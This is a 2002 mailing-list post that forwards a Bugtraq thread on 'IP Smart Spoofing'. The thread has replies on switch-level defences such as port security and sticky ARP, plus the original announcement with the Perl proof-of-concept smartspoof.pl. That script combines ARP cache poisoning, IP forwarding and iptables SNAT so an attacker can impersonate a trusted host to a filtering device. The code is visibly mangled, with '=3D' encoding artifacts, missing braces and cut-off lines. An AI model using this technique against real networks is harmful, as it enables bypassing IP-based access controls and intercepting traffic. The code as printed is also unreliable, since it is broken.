[GTER] Fw: Exploit code for IP Smart Spoofing

Giordani Rodrigues giordani em infoguerra.com.br
Quinta Novembro 14 16:26:00 BRST 2002

É provável que os integrantes da lista já tenham lido na Bugtraq, mas como o
assunto tem gerado algumas mensagens aqui, resolvi transcrever a thread.



----- Original Message -----
From: "Stephen Gill" <gillsr em yahoo.com>
To: "'Laurent Licour'" <llicour em althes.fr>; <bugtraq em securityfocus.com>
Sent: Thursday, November 14, 2002 1:09 PM
Subject: RE: Exploit code for IP Smart Spoofing

Thanks for your note.  In reality IP Smartspoofing is no different than
ARP cache poisoning so I'm not entirely sure why a new name was
"invented".  In this particular case one is able to prevent the
 - key ports and corresponding MAC entries are hardcoded and secured (ie
gateways).  If there is a MAC violation, this is logged and the port is
shut down.  9 times out of 10 if someone is performing ARP spoofing they
will go for a device that is best connected so consider this a fly trap.
 - host ports are protected by only allowing one MAC address on a port
at any given time with a lag of 5 minutes for timeout.  Yes a station
can change its hardcoded MAC.  This will allow them to see at most the
traffic of one other host on the switch.  Not perfect, but the odds are
greatly reduced.

A couple of ways that come to mind for having complete protection are:
 - have a method of detecting duplicate MAC addresses on a switch
 - enable "sticky" ARP.  This will keep end stations from being able to
change their MAC address, but at a potentially high administrative
burden.  I'll make a note of this option in the doc.

-- steve

-----Original Message-----
From: Laurent Licour [mailto:llicour em althes.fr]
Sent: Thursday, November 14, 2002 3:56 AM
To: bugtraq em securityfocus.com
Cc: 'Stephen Gill'
Subject: RE: Exploit code for IP Smart Spoofing

Your document is quite usefull, but there is no way to protect against
IP smartspoofing with a switch.
Smartspoofing use ARP cache poisonning of hosts.
Using a switch, you can only protect against MAC spoofing as describe in
your document.
You can also detect and refuse the plug of a new host on your network.
as it is possible
to change the MAC address of hosts (at least linux and windows 2000),
protection is not very strong.
You just have to replace a host by another.

One way to protect with switchs could be the use of switchs that are
able to
their CAM entry with the PORT, the MAC and the IP. (against PORT and MAC
only for now)
I think that only layer 3 switch are able to do such work. I have
however no
specific information
about which switch support this feature.
Nortel Passeport 8600 is supposed to do this with the IP filter feature
(something like an ACL
associated with each PORT)

In any case, this could protect only a LAN. If you put a source IP
rule IP that allows
an external IP, you have no way to detect a spoofing connexion. Only
cryptography can help you


Laurent Licour
llicour em althes.fr

-----Message d'origine-----
De : Stephen Gill [mailto:gillsr em yahoo.com]
Envoyé : mercredi 13 novembre 2002 20:33
À : 'Laurent Licour'; bugtraq em securityfocus.com
Objet : RE: Exploit code for IP Smart Spoofing

In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines.  The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.


Comments or suggestions welcome.
-- steve

-----Original Message-----
From: Laurent Licour [mailto:llicour em althes.fr]
Sent: Tuesday, November 12, 2002 6:21 AM
To: 'bugtraq em securityfocus.com'
Subject: Exploit code for IP Smart Spoofing


As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced
new method for IP Spoofing, allowing full-connexion from any client

The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method

The additional software "arp-fillup" is necessary to achieve this:

These tools are also available on

Exploit Code (perl source) :

#!/usr/bin/perl -w
# smartspoof.pl
# This script is provided as proof of concept for educational purpose
# Laurent Licour 28/10/02
# llicour em althes.fr
# Althes (http://www.althes.fr)
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

sub get_ip_next_hop
  my ($ip0, $int) =3D @_;
  my $ip=3Dnew NetAddr::IP $ip0;
  open(ROUTE, "route -n |");
  my $gateway=3D"";
  my $masklen; my @fields; my $line; my $entry;
  while($line =3D <ROUTE>)
    @fields =3D split / +/, $line;
    $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
      if (($gateway eq "") or ($masklen < $entry->masklen()))
        $gateway =3D $fields[1];
        $masklen =3D $entry->masklen();
        $$int =3D $fields[7];
        chop $$int;
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=3D$ip->addr() if ($gateway eq "");


sub get_mac
  my $ip=3Dshift;
  my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
  $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=3D`$cmd`;

sub usage
  print "Start/Stop de smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipement to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software
this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational
  print "\n";

  exit 0;

my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S
source> -start|-stop\n";

my $ver =3D "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);

           "D=3Ds" =3D> \$ipdst,
   "S=3Ds" =3D> \$ipsrc,
   "i=3Ds" =3D> \$interface,
   "v" =3D> \$version,
   "h" =3D> \$help,
   "start" =3D> \$start,
   "stop" =3D> \$stop
          ) or die $syntax;

usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");

if ($start)
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  print "Set NAT rule on iptables\n";
  $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT

  print "Desactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j

  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
  $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
$ipdst_next_hop -c 1 >/dev/null 2>&1";
  $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
$ipdst_next_hop >/dev/null 2>&1 &";
elsif ($stop)
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
  system("killall arp-sk");
  my $mac=3Dget_mac($ipsrc_next_hop);
  $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Desactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");


Laurent Licour
mailto:llicour em althes.fr


* Cet e-mail et toutes les pièces jointes sont destinés aux     *
* seules personnes auxquelles ils sont spécifiquement adressés  *
* et n'engagent que le signataire de ces documents et non la    *
* structure dont il dépend.                                     *
* Leur existence et leur contenu ont un caractère confidentiel. *
* Toute utilisation ou diffusion non autorisée est interdite.   *
* Si vous avez reçu cet  e-mail ou si vous détenez sans en être *
* le destinataire, nous vous demandons de bien vouloir nous en  *
* informer immédiatement.                                       *
* Cette note assure que ce message a été contrôlé et ne         *
* comprenait aucun virus connu à ce jour, néanmoins tout        *
* message électronique est susceptible d'altération.            *
* Nous déclinons toute responsabilité au titre de ce message    *
* s'il a été altéré, déformé ou falsifié.                        *

More information about the gter mailing list